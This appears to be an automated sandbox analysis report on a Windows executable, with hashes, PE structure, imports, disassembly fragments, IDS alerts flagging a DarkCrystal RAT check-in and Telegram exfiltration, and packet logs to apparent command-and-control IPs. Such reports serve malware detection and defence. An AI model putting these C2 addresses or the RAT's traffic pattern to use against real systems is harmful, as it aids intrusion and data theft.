                                                                                                                  MD5:1FD9C0E96FA0A2F8D565FE4FB213EB86
                                                                                                                  SHA1:7DC87BCD84B5C867509BCC7634A7B5EAF4D1B9F7
                                                                                                                  SHA-256:8F90D047643E2E46B67FF76F440B5C3CE391A3204025821D0B76F38BF42C90C8
                                                                                                                  SHA-512:7FF19719E6C0F7F8D7CCC277195C039AFE6C1D83D952451CD0FEDCE200CD8538B6B166BE75B633A6842D9111CF8670283BCBFD55F4BB4BCB5D248935494DD742
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 138727 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.501793091596948
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:eP6sjvTqJa.exe
                                                                                                                  File size:2'317'084 bytes
                                                                                                                  MD5:f0944c44a97161524ce95c9f8a2629f9
                                                                                                                  SHA1:064fde39864f9095d21fde250473d0a39d6b15b3
                                                                                                                  SHA256:06c99a90dd5ad6dfb77196b202d73b6cffe2915cf9edc372da859c62ac0bc2e7
                                                                                                                  SHA512:31e579123e2a82b1bfe6fd357dd4e3ff65b32632879f554fcf22d3435b40682627ac6b07ca66fb3e9fd1bd03d6d2ccef709d42be21064e964e1513c5888ac504
                                                                                                                  SSDEEP:24576:2TbBv5rUyXVRD3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLm:IBJZTyyfXPzXKBy2GyGw4O0lmJIJU
                                                                                                                  TLSH:B2B5CF0675D18E73C2A157365567423D82A0DB2136A1EF0B3A4F20E6AD17BF08F726B3
                                                                                                                  Icon Hash:1515d4d4442f2d2d
                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                  Instruction
                                                                                                                  call 00007FA5F4B33CFBh
                                                                                                                  jmp 00007FA5F4B3360Dh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007FA5F4B26457h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007FA5F4B36A9Fh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007FA5F4B3379Ch
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007FA5F4B32D59h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007FA5F4B263D2h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007FA5F4B36559h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007FA5F4B33718h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007FA5F4B3653Ch
                                                                                                                  int3
                                                                                                                  jmp 00007FA5F4B37FD7h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-01T16:02:09.731720+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49711 | 34.117.59.81 | 443 | TCP
2025-01-01T16:02:10.878208+0100 | 1810009 | Joe Security ANOMALY Telegram Send Photo | 1 | 192.168.2.6 | 49712 | 149.154.167.220 | 443 | TCP
2025-01-01T16:02:15.989325+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49735 | 104.21.38.84 | 80 | TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 1, 2025 16:02:18.182733059 CET8049745104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.182945967 CET4974580192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.183103085 CET8049751104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.183362961 CET4975180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.186718941 CET8049761104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.186832905 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.207595110 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.212390900 CET8049761104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.565045118 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.570000887 CET8049761104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.632294893 CET8049761104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:18.766331911 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:18.920722961 CET8049761104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.063172102 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.103590965 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.104487896 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.108632088 CET8049761104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.108684063 CET4976180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.109338999 CET8049771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.109400988 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.109544039 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.115130901 CET8049771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.467936039 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.472793102 CET8049771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.553513050 CET8049771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.766282082 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.766470909 CET8049771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.766514063 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:19.820770979 CET8049771104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:19.900506020 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.019026041 CET4977880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.023861885 CET8049778104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.023922920 CET4977880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.024027109 CET4977880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.028789997 CET8049778104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.221204996 CET49779443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:20.221261978 CET4434977934.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.221461058 CET49779443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:20.224790096 CET49779443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:20.224816084 CET4434977934.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.229942083 CET4977880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.237276077 CET4977180192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.245543957 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.250356913 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.250473022 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.250724077 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.252579927 CET49779443192.168.2.634.117.59.81
                                                                                                                  Jan 1, 2025 16:02:20.255968094 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.279592037 CET8049778104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.295336008 CET4434977934.117.59.81192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.395556927 CET8049778104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.395665884 CET4977880192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.415256977 CET6242653192.168.2.61.1.1.1
                                                                                                                  Jan 1, 2025 16:02:20.421205044 CET53624261.1.1.1192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.421308041 CET6242653192.168.2.61.1.1.1
                                                                                                                  Jan 1, 2025 16:02:20.427697897 CET53624261.1.1.1192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.445864916 CET6242980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.450712919 CET8062429104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.450995922 CET6242980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.450995922 CET6242980192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.455763102 CET8062429104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.598762035 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.603676081 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603687048 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603780985 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603790998 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603796959 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.603800058 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603809118 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603825092 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603828907 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603848934 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.603921890 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.603977919 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.603986979 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.604046106 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.608587027 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608597040 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608750105 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608758926 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608778000 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.608778954 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608808994 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.608810902 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608836889 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.608907938 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.608939886 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.608989000 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.609020948 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.609102011 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.609111071 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.609118938 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.609133005 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.609183073 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.609191895 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.609195948 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.609349012 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.613835096 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.613919973 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.613929987 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.613977909 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.614006042 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614044905 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.614113092 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614115000 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.614121914 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614125967 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614135027 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614142895 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614208937 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.614243031 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614252090 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614259958 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614269018 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614284039 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614293098 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614315987 CET4978080192.168.2.6104.21.38.84
                                                                                                                  Jan 1, 2025 16:02:20.614321947 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614331007 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614346027 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614425898 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614496946 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614507914 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.614525080 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.618906021 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.618916035 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.618962049 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.618971109 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619066954 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619076014 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619151115 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619159937 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619189024 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619256973 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619277954 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619293928 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619381905 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619399071 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619421005 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619457960 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619501114 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619510889 CET8049780104.21.38.84192.168.2.6
                                                                                                                  Jan 1, 2025 16:02:20.619602919 CET8049780104.21.38.84192.168.2.6
